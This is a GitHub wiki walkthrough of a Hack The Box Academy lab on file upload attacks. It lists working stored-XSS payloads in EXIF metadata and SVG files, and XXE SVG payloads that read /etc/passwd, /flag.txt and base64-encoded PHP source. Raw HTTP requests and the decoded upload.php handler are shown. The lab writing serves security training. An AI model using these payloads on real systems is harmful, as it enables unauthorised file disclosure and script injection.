Hack The Box Academy ‐ File Upload Attacks: Limited File Uploads - 570n3p057/570n3p057 GitHub Wiki
- Example 1 - Stored XSS
ssali36@htb[/htb]$ exiftool -Comment=' "><img src=1 onerror=alert(window.origin)>' HTB.jpg
ssali36@htb[/htb]$ exiftool HTB.jpg
...SNIP...
Comment : "><img src=1 onerror=alert(window.origin)>
- Example 2 - Stored XSS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
<rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
<script type="text/javascript">alert(window.origin);</script>
</svg>
- Example 1 - XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>
- Example 2 - XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>
The above exercise contains an upload functionality that should be secure against arbitrary file uploads. Try to exploit it using one of the attacks shown in this section to read "/flag.txt"
For this work through, I want to start at the...well start. After launching the target system, lets visit the web page it is hosting and get all the source code we can.
- Root Page Source Code
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Employee File Manager</title>
<link rel="stylesheet" href="./style.css">
</head>
<body>
<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
<script src="./script.js"></script>
<div>
<h1>Update your logo</h1>
<center>
<form action="upload.php" method="POST" enctype="multipart/form-data" id="uploadForm">
<input type="file" name="uploadFile" id="uploadFile" accept=".svg">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" height="150px" preserveAspectRatio="xMidYMid meet" role="img" viewBox="0 0 24 24" width="150px"><path d="M11.996 0a1.119 1.119 0 0 0-.057.003a.9.9 0 0 0-.236.05a.907.907 0 0 0-.165.079L1.936 5.675a.889.889 0 0 0-.445.77V17.556a.889.889 0 0 0 .47.784l9.598 5.541l.054.029v.002a.857.857 0 0 0 .083.035l.012.004c.028.01.056.018.085.024c.01.001.011.003.016.004a.93.93 0 0 0 .296.015a.683.683 0 0 0 .086-.015c.01 0 .011-.002.016-.004a.94.94 0 0 0 .085-.024l.012-.004a.882.882 0 0 0 .083-.035v-.002a1.086 1.086 0 0 0 .054-.029l9.599-5.541a.889.889 0 0 0 .469-.784V6.48l-.001-.026v-.008a.889.889 0 0 0-.312-.676l-.029-.024c0-.002-.01-.005-.01-.007a.899.899 0 0 0-.107-.07L12.453.127A.887.887 0 0 0 11.99 0zm.01 2.253c.072 0 .144.019.209.056l6.537 3.774a.418.418 0 0 1 0 .724l-6.537 3.774a.418.418 0 0 1-.418 0L5.26 6.807a.418.418 0 0 1 0-.724l6.537-3.774a.42.42 0 0 1 .209-.056zm-8.08 6.458a.414.414 0 0 1 .215.057l6.524 3.766a.417.417 0 0 1 .208.361v7.533a.417.417 0 0 1-.626.361l-6.523-3.766a.417.417 0 0 1-.209-.362V9.13c0-.241.196-.414.41-.418zm16.16 0c.215.004.41.177.41.418v7.532c0 .15-.08.287-.208.362l-6.524 3.766a.417.417 0 0 1-.626-.361v-7.533c0-.149.08-.286.209-.36l6.523-3.767a.415.415 0 0 1 .216-.057z" fill="#91F108"></path></svg> <input type="submit" value="Upload" id="submit">
</form>
</center>
</div>
</body>
</html>
After taking a peek at this, there are a few things to take note of:
- [http://94.237.49.212:39548/script.js] is called in the body section.
- The client side is expecting .svg 'accept=".svg"'
- 'action="upload.php" method="POST"' the page is going to send the image to 'upload.php' using the 'POST' method.
Now lets take a peek at 'script.js'
- Script.JS Source Code
$(document).ready(function () {
$("#submit").click(function (event) {
event.preventDefault();
var fd = new FormData();
var files = $('#uploadFile')[0].files[0];
fd.append('uploadFile', files);
$.ajax({
url: 'upload.php',
type: 'post',
data: fd,
contentType: false,
processData: false,
success: function () {
window.location.reload();
},
});
});
});
Now for script.js, we can see the function and we note it is ajax.
Let us get a request and reply header for the root page
- Clean Request Header - Root Page
GET / HTTP/1.1
Host: 94.237.49.212:39548
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
- Clean Reply Header - Root Page
HTTP/1.1 200 OK
Date: Sun, 16 Jun 2024 18:54:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1974
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Employee File Manager</title>
<link rel="stylesheet" href="./style.css">
</head>
<body>
<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
<script src="./script.js"></script>
<div>
<h1>Update your logo</h1>
<center>
<form action="upload.php" method="POST" enctype="multipart/form-data" id="uploadForm">
<input type="file" name="uploadFile" id="uploadFile" accept=".svg">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" height="150px" preserveAspectRatio="xMidYMid meet" role="img" viewBox="0 0 24 24" width="150px"><path d="M11.996 0a1.119 1.119 0 0 0-.057.003a.9.9 0 0 0-.236.05a.907.907 0 0 0-.165.079L1.936 5.675a.889.889 0 0 0-.445.77V17.556a.889.889 0 0 0 .47.784l9.598 5.541l.054.029v.002a.857.857 0 0 0 .083.035l.012.004c.028.01.056.018.085.024c.01.001.011.003.016.004a.93.93 0 0 0 .296.015a.683.683 0 0 0 .086-.015c.01 0 .011-.002.016-.004a.94.94 0 0 0 .085-.024l.012-.004a.882.882 0 0 0 .083-.035v-.002a1.086 1.086 0 0 0 .054-.029l9.599-5.541a.889.889 0 0 0 .469-.784V6.48l-.001-.026v-.008a.889.889 0 0 0-.312-.676l-.029-.024c0-.002-.01-.005-.01-.007a.899.899 0 0 0-.107-.07L12.453.127A.887.887 0 0 0 11.99 0zm.01 2.253c.072 0 .144.019.209.056l6.537 3.774a.418.418 0 0 1 0 .724l-6.537 3.774a.418.418 0 0 1-.418 0L5.26 6.807a.418.418 0 0 1 0-.724l6.537-3.774a.42.42 0 0 1 .209-.056zm-8.08 6.458a.414.414 0 0 1 .215.057l6.524 3.766a.417.417 0 0 1 .208.361v7.533a.417.417 0 0 1-.626.361l-6.523-3.766a.417.417 0 0 1-.209-.362V9.13c0-.241.196-.414.41-.418zm16.16 0c.215.004.41.177.41.418v7.532c0 .15-.08.287-.208.362l-6.524 3.766a.417.417 0 0 1-.626-.361v-7.533c0-.149.08-.286.209-.36l6.523-3.767a.415.415 0 0 1 .216-.057z" fill="#91F108"></path></svg> <input type="submit" value="Upload" id="submit">
</form>
</center>
</div>
</body>
</html>
Now for a little functionality analysis, let us tap the submit button:
- Submit Button Request Header - from Root page to /upload.php
POST /upload.php HTTP/1.1
Host: 94.237.49.212:39548
Content-Length: 150
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5PEj4co6tlQ6Samd
Origin: http://94.237.49.212:39548
Referer: http://94.237.49.212:39548/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
------WebKitFormBoundary5PEj4co6tlQ6Samd
Content-Disposition: form-data; name="uploadFile"
undefined
------WebKitFormBoundary5PEj4co6tlQ6Samd--
- Submit Button Request Header - from Root page to /upload.php
HTTP/1.1 200 OK
Date: Sun, 16 Jun 2024 19:11:27 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 27
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Only SVG images are allowed
So we see that upon submission, it is expecting the SVG file as we noted before. With no file selected it returns the 'Only SVG images are allowed' message.
Lets see what visiting /upload.php directly looks like.
- Request Header of /upload.php
GET /upload.php HTTP/1.1
Host: 94.237.49.212:39548
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
- Reply Header of /upload.php
HTTP/1.1 200 OK
Date: Sun, 16 Jun 2024 19:17:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 27
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Only SVG images are allowed
- Source Code of /upload.php
<html>
<head>
<meta name="color-scheme" content="light dark">
</head>
<body>
<div class="line-gutter-backdrop"></div>
<form autocomplete="off">
<label class="line-wrap-control">Line wrap<input type="checkbox" aria-label="Line wrap">
</label>
</form>
<table>
<tbody>
<tr>
<td class="line-number" value="1">
::before
</td>
<td class="line-content">Only SVG images are allowed
<span class="html-end-of-file">
</span>
</td>
</tr>
</tbody>
</table>
</body>
</html>
Lets try adding an image from the intended use, click on the HTB logo and select an image file. I created an SVG using puma.
: flag.svg
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///flag.txt"> ]>
<svg>&xxe;</svg>
- Request Header /upload.php with
flag.svg
POST /upload.php HTTP/1.1
Host: 94.237.54.176:41988
Content-Length: 307
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCa5BViaiNdpUUklA
Origin: http://94.237.54.176:41988
Referer: http://94.237.54.176:41988/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
------WebKitFormBoundaryCa5BViaiNdpUUklA
Content-Disposition: form-data; name="uploadFile"; filename="flag.svg"
Content-Type: image/svg+xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///flag.txt"> ]>
<svg>&xxe;</svg>
------WebKitFormBoundaryCa5BViaiNdpUUklA--
- Response Header /upload.php with
flag.svg
HTTP/1.1 200 OK
Date: Sun, 16 Jun 2024 22:29:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 26
Connection: close
Content-Type: text/html; charset=UTF-8
File successfully uploaded
Now for the true test, lets inspect the source code of the root page
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Employee File Manager</title>
<link rel="stylesheet" href="./style.css">
</head>
<body>
<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
<script src="./script.js"></script>
<div>
<h1>Update your logo</h1>
<center>
<form action="upload.php" method="POST" enctype="multipart/form-data" id="uploadForm">
<input type="file" name="uploadFile" id="uploadFile" accept=".svg">
<svg>HTB{REDACTED}
</svg> <input type="submit" value="Upload" id="submit">
</form>
</center>
</div>
</body>
</html>
I see something that shouldn't belong here!
<svg>HTB{REDACTED}</svg>
Try to read the source code of 'upload.php' to identify the uploads directory, and use its name as the answer. (write it exactly as found in the source, without quotes)
- Request Header /upload.php with image selected
: Image - testPHP.svg
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php"> ]>
<svg>&xxe;</svg>
- Request Header /upload.php with malicious image selected
POST /upload.php HTTP/1.1
Host: 94.237.54.176:41988
Content-Length: 347
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxN0vA26S7jIExAcx
Origin: http://94.237.54.176:41988
Referer: http://94.237.54.176:41988/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
------WebKitFormBoundaryxN0vA26S7jIExAcx
Content-Disposition: form-data; name="uploadFile"; filename="testPHP.svg"
Content-Type: image/svg+xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php"> ]>
<svg>&xxe;</svg>
------WebKitFormBoundaryxN0vA26S7jIExAcx--
- Response Header /upload.php with malicious image selected
HTTP/1.1 200 OK
Date: Sun, 16 Jun 2024 22:10:32 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 26
Connection: close
Content-Type: text/html; charset=UTF-8
File successfully uploaded
Lets check out the source code of the root page now...
HTTP/1.1 200 OK
Date: Sun, 16 Jun 2024 22:10:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1838
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Employee File Manager</title>
<link rel="stylesheet" href="./style.css">
</head>
<body>
<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
<script src="./script.js"></script>
<div>
<h1>Update your logo</h1>
<center>
<form action="upload.php" method="POST" enctype="multipart/form-data" id="uploadForm">
<input type="file" name="uploadFile" id="uploadFile" accept=".svg">
<svg>PD9waHAKJHRhcmdldF9kaXIgPSAiLi9pbWFnZXMvIjsKJGZpbGVOYW1lID0gYmFzZW5hbWUoJF9GSUxFU1sidXBsb2FkRmlsZSJdWyJuYW1lIl0pOwokdGFyZ2V0X2ZpbGUgPSAkdGFyZ2V0X2RpciAuICRmaWxlTmFtZTsKJGNvbnRlbnRUeXBlID0gJF9GSUxFU1sndXBsb2FkRmlsZSddWyd0eXBlJ107CiRNSU1FdHlwZSA9IG1pbWVfY29udGVudF90eXBlKCRfRklMRVNbJ3VwbG9hZEZpbGUnXVsndG1wX25hbWUnXSk7CgppZiAoIXByZWdfbWF0Y2goJy9eLipcLnN2ZyQvJywgJGZpbGVOYW1lKSkgewogICAgZWNobyAiT25seSBTVkcgaW1hZ2VzIGFyZSBhbGxvd2VkIjsKICAgIGRpZSgpOwp9Cgpmb3JlYWNoIChhcnJheSgkY29udGVudFR5cGUsICRNSU1FdHlwZSkgYXMgJHR5cGUpIHsKICAgIGlmICghaW5fYXJyYXkoJHR5cGUsIGFycmF5KCdpbWFnZS9zdmcreG1sJykpKSB7CiAgICAgICAgZWNobyAiT25seSBTVkcgaW1hZ2VzIGFyZSBhbGxvd2VkIjsKICAgICAgICBkaWUoKTsKICAgIH0KfQoKaWYgKCRfRklMRVNbInVwbG9hZEZpbGUiXVsic2l6ZSJdID4gNTAwMDAwKSB7CiAgICBlY2hvICJGaWxlIHRvbyBsYXJnZSI7CiAgICBkaWUoKTsKfQoKaWYgKG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJ1cGxvYWRGaWxlIl1bInRtcF9uYW1lIl0sICR0YXJnZXRfZmlsZSkpIHsKICAgICRsYXRlc3QgPSBmb3BlbigkdGFyZ2V0X2RpciAuICJsYXRlc3QueG1sIiwgInciKTsKICAgIGZ3cml0ZSgkbGF0ZXN0LCBiYXNlbmFtZSgkX0ZJTEVTWyJ1cGxvYWRGaWxlIl1bIm5hbWUiXSkpOwogICAgZmNsb3NlKCRsYXRlc3QpOwogICAgZWNobyAiRmlsZSBzdWNjZXNzZnVsbHkgdXBsb2FkZWQiOwp9IGVsc2UgewogICAgZWNobyAiRmlsZSBmYWlsZWQgdG8gdXBsb2FkIjsKfQo=</svg> <input type="submit" value="Upload" id="submit">
</form>
</center>
</div>
</body>
</html>
Now that is different from the original source code from above. We see some encoded entry, Base64 by the glance. I used CyberChef.io, but you can echo it into a CLI echo "<paste>" | base64 -d to get the output. CyberChef just displays it a bit better for me...tomato, tomaato.
- Base64 Output
<?php
$target_dir = "./images/";
$fileName = basename($_FILES["uploadFile"]["name"]);
$target_file = $target_dir . $fileName;
$contentType = $_FILES['uploadFile']['type'];
$MIMEtype = mime_content_type($_FILES['uploadFile']['tmp_name']);
if (!preg_match('/^.*\.svg$/', $fileName)) {
echo "Only SVG images are allowed";
die();
}
foreach (array($contentType, $MIMEtype) as $type) {
if (!in_array($type, array('image/svg+xml'))) {
echo "Only SVG images are allowed";
die();
}
}
if ($_FILES["uploadFile"]["size"] > 500000) {
echo "File too large";
die();
}
if (move_uploaded_file($_FILES["uploadFile"]["tmp_name"], $target_file)) {
$latest = fopen($target_dir . "latest.xml", "w");
fwrite($latest, basename($_FILES["uploadFile"]["name"]));
fclose($latest);
echo "File successfully uploaded";
} else {
echo "File failed to upload";
}
And just like that we have the upload directory.
$target_dir = "./images/";
But I will do you one better....you didn't necessarily need to go through all of that. You could have ffuf'ed the url for a directory enumeration and found that the only other accessible directory was /images/...
I have to be honest, I attempted this with OpenVPN and my local machine. HTB was a bit buggy and laggy so I had to switch to the PWN box. If you are running into issues with the upload functionality not returning either a successful or failed upload, may need to restart the target, or if you are on OpenVPN switch to PWN box.